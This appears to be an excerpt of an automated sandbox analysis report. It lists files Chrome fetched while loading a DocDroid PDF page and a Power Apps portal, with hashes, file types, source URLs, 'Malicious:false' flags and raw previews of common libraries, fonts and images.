                                                                          Preview:GIF89a...........................................vvv......hhh..........................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,........... .$.AeZ...<...Q46.<...A.......H.a....:....ID0.F...a\xG.3...!...O:-....Rj...TJ..*........t...........~."...ds]......)t...-"...i;H>.n.Qg]_*......R.3.....GI?.....v$...j3!.!.......,........... .$.0eZ..y..0..q ..P..W...)";..qX.^..D50......<H3.!.....k-.n..a. .(.i...d.$P@y.w`.J..#.....?..y........o...g.....f....'8..{..'C.p`j.n."...2.{.`x...jy.4...C,.4..o#n.$.....!.!.......,........... .$. eZ...$.2.....q....E. ....p$H@D/.....G.D.j8v#..P((D..... ..N.(3..#.y....(@...gUx*.kK.).....?K...............$..."....*.......K.....W......x..?.G...#.W....n.h.K,.....+.....*!.!.......,........... .$ .eZ..Y.$1..Q(c......O'"............. 1....q.d"..A.....V.x8p..4988.MRC.@....e*.3@.iI.)..'.?I.........@.......,.....#.........5..,.....".E..z...?..@.E...@.....).....*!.!.......,........... .$.(e..$....C.E1..;...('2$..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (28287)
                                                                          Category:downloaded
                                                                          Size (bytes):859263
                                                                          Entropy (8bit):5.352414025453325
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:582A4E04BDFB5EE48C418EE794E2D5FB
                                                                          SHA1:3C9D40E89C8A41EF3A5ACAB67FB3ED734D4FE0AF
                                                                          SHA-256:B5E7D9E01AFE0F488867FC92714E054D65CFB604383C2867F5E123493740A371
                                                                          SHA-512:60423135BA4F0BA0EE8E2121ADF460F2EF2B16B011E4170FFA9040E58C73D0F15E139B876DE430B0AF608C90B5BDDC870132DD5600D75F850651F4ED356EA2F8
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf.bundle-582a4e04bd.js
                                                                          Preview:!function(n){var r={};function o(e){if(r[e])return r[e].exports;var t=r[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,o),t.l=!0,t.exports}o.m=n,o.c=r,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(t,e){if(1&e&&(t=o(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var r in t)o.d(n,r,function(e){return t[e]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=12)}({12:function(e,t,n){n(13).polyfill()},13:function(e,t,n){"use strict";function r(e,t){if
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32065)
                                                                          Category:downloaded
                                                                          Size (bytes):85578
                                                                          Entropy (8bit):5.366055229017455
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                          Category:downloaded
                                                                          Size (bytes):77160
                                                                          Entropy (8bit):7.996509451516447
                                                                          Encrypted:true
                                                                          SSDEEP:
                                                                          MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                          SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                          SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                          SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/fonts/fontawesome-webfont.woff2?20fd1704ea223900efa9fd4e869efb08
                                                                          Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):80
                                                                          Entropy (8bit):4.509183719779188
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:F4A0E619B855697F4DB1A1B22FE37E8C
                                                                          SHA1:3D1CA30185839E05C6D876C7E8477604BFAC6CDA
                                                                          SHA-256:CEC86F53B19C31BC124614007553A6EBC5434F9B1D2F03B1DB0393B22AB16EA2
                                                                          SHA-512:8FF46BF8D3B93DA72109C92A26D5FF4C8E16FD6CD98FBB0E6A9E7E31E55220E8B2D71B851219199DF9C6D2074137192F55F84B4B89AF9C4C4D1B9D6FDB94EFC5
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pcf-loader.bundle-f4a0e619b8.js
                                                                          Preview:$(()=>{if(window.loadAllPcfControlsOnPage){window.loadAllPcfControlsOnPage()}});
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65460)
                                                                          Category:downloaded
                                                                          Size (bytes):1387811
                                                                          Entropy (8bit):5.564203675549718
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:A1E11825ED20343F16617AA6F27AB7B1
                                                                          SHA1:58722A35494F3640DD128DFB7837268EA15CD09D
                                                                          SHA-256:2D815856E17EA0956434F14CB6F7F601CDFD292C2DB0F6592C07622F06FEAC64
                                                                          SHA-512:EF71A0566BED821BA3571C141E068FCFC5047F62FBD0380B862CB1D8A9717CCD3DDABE53581B356CFCD6D5012E0C8911758D639829C30362A30760B2925B9293
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/js/pdfjs-worker.js?id=a1e11825ed20343f1661
                                                                          Preview:/*! For license information please see pdfjs-worker.js.LICENSE.txt */.(()=>{var e={9742:(e,t)=>{"use strict";t.byteLength=function(e){var t=c(e),r=t[0],n=t[1];return 3*(r+n)/4-n},t.toByteArray=function(e){var t,r,i=c(e),o=i[0],s=i[1],u=new a(function(e,t,r){return 3*(t+r)/4-r}(0,o,s)),l=0,f=s>0?o-4:o;for(r=0;r<f;r+=4)t=n[e.charCodeAt(r)]<<18|n[e.charCodeAt(r+1)]<<12|n[e.charCodeAt(r+2)]<<6|n[e.charCodeAt(r+3)],u[l++]=t>>16&255,u[l++]=t>>8&255,u[l++]=255&t;2===s&&(t=n[e.charCodeAt(r)]<<2|n[e.charCodeAt(r+1)]>>4,u[l++]=255&t);1===s&&(t=n[e.charCodeAt(r)]<<10|n[e.charCodeAt(r+1)]<<4|n[e.charCodeAt(r+2)]>>2,u[l++]=t>>8&255,u[l++]=255&t);return u},t.fromByteArray=function(e){for(var t,n=e.length,a=n%3,i=[],o=16383,s=0,c=n-a;s<c;s+=o)i.push(u(e,s,s+o>c?c:s+o));1===a?(t=e[n-1],i.push(r[t>>2]+r[t<<4&63]+"==")):2===a&&(t=(e[n-2]<<8)+e[n-1],i.push(r[t>>10]+r[t>>4&63]+r[t<<2&63]+"="));return i.join("")};for(var r=[],n=[],a="undefined"!=typeof Uint8Array?Uint8Array:Array,i="ABCDEFGHIJKLMNOPQRSTUVW
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:data
                                                                          Category:downloaded
                                                                          Size (bytes):14464
                                                                          Entropy (8bit):7.9800169877863985
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:4A8BA408601003ED83365E4A5C15D0FA
                                                                          SHA1:8D5AD3DE3AAA6CFF8A19824B2055674E1358033D
                                                                          SHA-256:FD21B9DE637DE917232AD7A8D0778B0B2BC13D36BA90B909E78313D3CAE9B46D
                                                                          SHA-512:BA07FEB28061789812AE4DD05E3FC27CEE391D1D3DEDE393C8BCBC9B6C3439E617D0F5F999D2CEF5F2897C067D06204EB982E965F9872614FDEB096214B4337E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                                          Preview:.^.H......>.}.............Vpr.%.....6v...pXJ..&.=..&....K..H...2. .eY.)B.]x...((AP........?...roIV{........n{...m..=.."f........*.3. .YjR....u.:...~....p......w..?.....D..k.!+....Y.1.k.J._..........p..Zgg..Zg...k.vpw.k...Y.....+.u^..............O.....o...<:..7:...A.T...d.rx.;...G.....k....*2......".....>h..f++..pn.....|[p.m.....Ys!.m.R.R......@j0.d......%.&.N.!.j.v.A.?E...&.y.t.Q.._.....C.G....U.....f[qTip.5......p.P.-....-.&.vY...D.m..A.^......q<6..%./K..yI....i.q..8..y.N...R..^..../9..*....)...(=.....YM....P.@...}...|.....w.n..y.d[..*.k..N..P#........3..+.X._.O..~3.E......E...}Z.....ao.D..-..8...QAH.g.....~.X.....1..6S@G~".S..I..*m..e.<../u.iW.h........V.)OdJ..Z...j&.cN.Y..5f..t8....2.i........Z....Q@A...p.K.q.3.`.;.c./q.s......W..=.....k..G|.g|._x.7x._....w.....~.w..U..E.).E.X)f...Bq..U\*.+..F.T.)......c..Hq..U.).*...._....*^+.*>*.)>+>).R.R.Q.S..x..U..o..?.?).S.....(..10z.1c,...k.-.1g\1..7.%.q..g.d.3..G....c..q.x...........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):1746
                                                                          Entropy (8bit):7.0941604123505115
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:FF9BBAC9E01B1DDD59C87D1E8DD194D1
                                                                          SHA1:018AD340A895FB021B57B3C08A4D88646F2981F1
                                                                          SHA-256:C28BD21CF6420D2282292B8FD5DF776B62B68C9681AEDC0D2E73D6444C0BF3A1
                                                                          SHA-512:CC7AEF1C346579FF31A504B82D719D73A15A895D08494AF0BA6905CD5DDF4B147FEA627E96AF4AAB8F177A84283F51F10FEF08C71C75851023A0ECF9A26A681E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.png
                                                                          Preview:RIFF....WEBPVP8L..../..?..:..)....Lef..x...^..@.T..Ybf.%y.....PD.<.......eK.[c.|. 9..H..g).....O\ue.....n$I...~.@/..9'6....4.{.Q....m;m........7_...e.....N.s'.....A+.>.tz \.zg...............8.8.[.q.]..Z.....k.....M.< ..\...A.............h..O..............e..$.SE$K.....6..!..?..?....iT.?..?..?..?.3...}TE......@y.......X.p.O....}.p|X.J...................(.........e....?..."...............k\I................m..q...g.*...{.Rs............/...a....j.............b..8L.Ti.;.........r@....._.....`Ta....>;.....9.....RXU.].J.~.9..L...5......9............9..(.We...)..d..0.t-....g.9...._.h.../.u,../6k.....h.;........q.........!..N...?..../}..{..?......g...w4.....g.....9.`l....o!.~qpD."rj.M...>..>Q.O.....5......c.....9.`../...K..2.K5<.SU.J...IpV...........Ui.......n............/..8...?...5..2.e.N..i...uS?e..`....\0.......j..........>j-".(Q,..T...o....%43.`P...P.W.}.........j$...>&...\u...Zo...s.2l..QkUl....s........]7......>'j.=7..1.|...~..T=...qX;........s..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (540), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):540
                                                                          Entropy (8bit):5.0135089870329255
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:2739C60227F87D19F5C784BFFB5991F8
                                                                          SHA1:42DBAC51553D7778A176E710D3CE1009884DE167
                                                                          SHA-256:974FECBEBCF2F295348C3631FE069966EAB4B4B57CD4FCBE15FB70D0ACAB47C6
                                                                          SHA-512:42C81F41962FE4B5FA556EEDF1C9D9CB2F1D9D182D7BF29E2F8D69BE2CA5553E10D89893D4B8699D1E60FDAB19D1C5D9BC9C686C6C2DBC58DAB85070D43596CD
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/pwa-style.bundle-2739c60227.css
                                                                          Preview:#offlineNotificationBar{padding-top:10px;padding-bottom:10px;background:#fff4ce}#message{position:relative;font-family:Segoe UI;font-style:normal;font-weight:600;font-size:12px;line-height:133%;color:#323130}html[dir=rtl] #message{right:36px;margin-left:64px}html[dir=ltr] #message{left:36px;margin-right:64px}#web{position:absolute;line-height:100%}html[dir=rtl] #web{right:12px}html[dir=ltr] #web{left:12px}#close{position:absolute;line-height:100%;display:flex;cursor:pointer}html[dir=rtl] #close{left:8px}html[dir=ltr] #close{right:8px}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32012)
                                                                          Category:downloaded
                                                                          Size (bytes):69597
                                                                          Entropy (8bit):5.369216080582935
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16740, version 1.0
                                                                          Category:downloaded
                                                                          Size (bytes):16740
                                                                          Entropy (8bit):7.987129055190075
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:E43B535855A4AE53BD5B07A6EEB3BF67
                                                                          SHA1:6507312D9491156036316484BF8DC41E8B52DDD9
                                                                          SHA-256:B34551AE25916C460423B82BEB8E0675B27F76A9A2908F18286260FBD6DE6681
                                                                          SHA-512:955A4C3EA5DF9D2255DEFC2C40555AC62EEAFCC81F6FA688BA5E11A252B3ED59B4275E3E9A72C3F58E66BE3A4D0E9952638932FA29EB9075463537910A8E0CE6
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/fonts/open-sans-v34-latin-regular.woff2?a1535f451fb7bb98f526f30e1050f487
                                                                          Preview:wOF2......Ad......{...@..........................b. ..P.`?STAT^.....|...........z.....6.$..8. ..x. .....k52.E..;._..D.....3]...'$'c...t.U.Va.....F..u:.wu#m8...N....}Y.........W.Ifk.BR.u...%....].|..Q..d[...X.....Umf.0.{n..=....i...F.|...s.....X._.c44..W...=.<......@7..._..3.L)3)* }..L.I.U..~......1..zf!+t....L.B,...`...U.E.#...7+w..4$...Kdb....R.E....Lq.!....|R..Dv@.A.Z..Z+.*....p\{.....e.2.....i2./.w).90@>...{...mp.o...MY8c.......h..J..*. ...`.6]*F.\...._...).....7.p.;.<.b.$%.t..lr...l...s...R...XS...!...i.!..Rt\G.t.s.W..U....;.........u/......4i.Fph.....x..u..9.@EsU1O...S4.293..bG..FMA..l.\V.h...f;..K.GH.....h.....s.j..,fg.K......P"ya..2..w...R..C...3.....S.c..JE..K............yd#..].`.MP8.#.[...-.e...u.......i.....nP..b..........QlI....<.....P..$I...r5.:.BG.O...#.-..K..v\.........i..xkA..j..xg1eP..H.J..S.....n....Q.J.j.....n.H..OT....0..."..0......B.2..`.F..../U....}.0'Bz..'L?.i\.^...Uz.^.xBF(.v.!.....sw-...UW....IS.*I....Y...J..w.....7...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):64
                                                                          Entropy (8bit):4.299297908526345
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:0F9E28E9431240A366540F515423E280
                                                                          SHA1:58DB6E7924D922DD339F5B220E5DCEC6544B3259
                                                                          SHA-256:E16F05D7985BFFD88BB185F1B96584214547CD4E12C31E53BC4D16A9635EDBE3
                                                                          SHA-512:9192E5AAA63A915C7A513902E01E954D32952BA19A3EC5BAFB336533A6AB865EADCA7727FC45D3E3054457B9F0DB46BF4661F40C0AB431D583D0722AA70BA545
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhI1CaGyPkrHFvrHEgUNDksRgRIFDa3TapASBQ14bxIZEgUNDksRgRIFDcZosPwhTys0q0mzM_M=?alt=proto
                                                                          Preview:Ci0KBw0OSxGBGgAKBw2t02qQGgAKBw14bxIZGgAKBw0OSxGBGgAKBw3GaLD8GgA=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:data
                                                                          Category:downloaded
                                                                          Size (bytes):13529
                                                                          Entropy (8bit):7.981473427014176
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:3EEFFD5E7F96EE19160EE0825AE7125A
                                                                          SHA1:972607DACBF55571A329CC15151D8D62BC95CA42
                                                                          SHA-256:6F15987DCBA055366BF7ECEC02A42949E326C4548F11DA42124F58A22FFCF0E6
                                                                          SHA-512:39EEF3197AA3AF7CB3D9613117660988B43D612F3A802D5A53938A9504CE2FB321ADE6941B57D9577CB97B7A0746FE35D77E513E92282B389DB74F9F5E892BC6
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                          Preview:./..HNZ=....z....Y....2.]Gu)..........L..@zv..r.].51..%.f....U.s.....t...VCR..m...Mw.+~*...Hl`*.....p.}.... ..8s.<..4>".sLQ....l..C...!4]HjJ.......@?.*...A).:.v?..U{no:.7$...1>@'*cR..KE.RJ........E...8.|hu.....j..*..'..%.S.9..3......x2.}.O...*.u...*....L...=..[x?.{...../.........%].`2...h#K_q....jN.;.....?....vy.......wQ.d..w... ..aWD..qm.q,.v..... ..g._j..L..+......._.qM.....D.,....q.....|.<!....@.y$y.....A..g.[.A....n...S.......X./..n..9.5Y.)k....o..qj?.%......p{.md........zH.j....u....9[..fv0F..G...8.F..&...7..+.|sO.k..W..W.....4...]>........._..0d..2.l.....7..:..2x..$.O].eq..,.....f]n"c#..r..T...w[..[e...E.q,...........zP.i.k...N.=..1..@8.SV..h.FK6.m...)...6r....3.`.9.......K.......p.[|.5n...H.(...D..d.X......D......,..=....n.Y....o.y..{@0S......)Kn.\.k3.8.....#....^}.n..L..g{..K./.E.....[...........]...$.....+C.%.....\.K..Eq,.Ch.....".A..nK..R...'1 2]'3..U.\..:!..O....*...C.KK..YB...b..y-..~1iA...VN .V...^&.w.}.w...v....(......HC{.Y...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):278936
                                                                          Entropy (8bit):5.18956165960999
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:612DF4DA3AB9A356C009D60166EA4133
                                                                          SHA1:CD65363B32C3500E437034CB952E22E503460AA9
                                                                          SHA-256:D92FC8671B3DF621E0126D7DAC8D5ABC026ECC199F2A66C29DC1FB583FCE1378
                                                                          SHA-512:9337A239755B4B0CFA4F9155ADBAF5AB28072EF465403768DEC8A6E013AB43367E0947FA68B7ABDF7EEECA90379DFF3C4218940B030E7FE48A34B5CF09820E1D
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://content.powerapps.com/resource/powerappsportal/dist/app.BootstrapV5.bundle-612df4da3a.js
                                                                          Preview:(function(w){function c(e){this._element=w(e);this._target=this._element.data("bsTarget")||{};this._attachmentSettings=this._element.data("attachmentsettings");this._serviceUrlGet=this._element.attr("data-url-get");this._serviceUrlAdd=this._element.attr("data-url-add");this._serviceUrlEdit=this._element.attr("data-url-edit");this._serviceUrlDelete=this._element.attr("data-url-delete");this._serviceUrlGetAttachments=this._element.attr("data-url-get-attachments");this._serviceUrlGetAttachmentsCount=this._element.attr("data-url-get-attachments-count");this._hideFieldLabel=this._element.attr("data-hide-field-label");this._attachmentAcceptTypes=this._element.attr("data-add-accept-types");this._addEnabled=this._element.data("add-enabled");this._editEnabled=this._element.data("edit-enabled");this._deleteEnabled=this._element.data("delete-enabled");this._isRTEEnabled=this._element.data("rte-enabled");this._isTimeLine=this._element.data("is-timeline");this._pageSize=this._element.attr("data-pag
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                          Category:dropped
                                                                          Size (bytes):673
                                                                          Entropy (8bit):7.6596900876595075
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:0E176276362B94279A4492511BFCBD98
                                                                          SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                          SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                          SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (1155)
                                                                          Category:downloaded
                                                                          Size (bytes):11507
                                                                          Entropy (8bit):4.710778360189544
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:8F94DBA22413400947760E2FDE4B635E
                                                                          SHA1:23FC9DEB4CF6890A3E208A412EC5F6709902A7BF
                                                                          SHA-256:5C08FF6E13A4D94B014064C8ECA819B711B9C2E0E3E3DB59AB0C3749026C02FE
                                                                          SHA-512:EC5BDC74FFF668EF48F8D6DEB85D62DD367185B7A70C43C9C5B3952CA284063349C013F0271B805F8D9E886519B45FFB4C4B03B061A231BE8199F01C827EF7A5
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdf
                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. Meta Information -->. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1">.. . <title>GR39475037090-2.pdf | DocDroid</title>.... <link rel="shortcut icon" href="/images/favicon.png">.....<link rel="canonical" href="https://www.docdroid.com/nNVSVjJ/gr39475037090-2-pdf">.<link rel="shortlink" href="https://docdro.id/nNVSVjJ">.<link rel="alternate" media="application/pdf" href="https://www.docdroid.com/file/download/nNVSVjJ/gr39475037090-2-pdf.pdf" title="GR39475037090-2.pdf">.<meta name="twitter:card" content="summary_large_image">.<meta name="twitter:image" content="https://www.docdroid.com/thumbnail/nNVSVjJ/1500,750/gr39475037090-2-pdf.jpg">.<meta property="og:type" content="article"/>.<meta property="og:image" content="https://www.docdroid.com/thumbnail/nNVSVjJ/1500,785/gr39475037090-2-pdf.jpg"> facebook -->.<meta proper
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (19015)
                                                                          Category:downloaded
                                                                          Size (bytes):19188
                                                                          Entropy (8bit):5.212814407014048
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
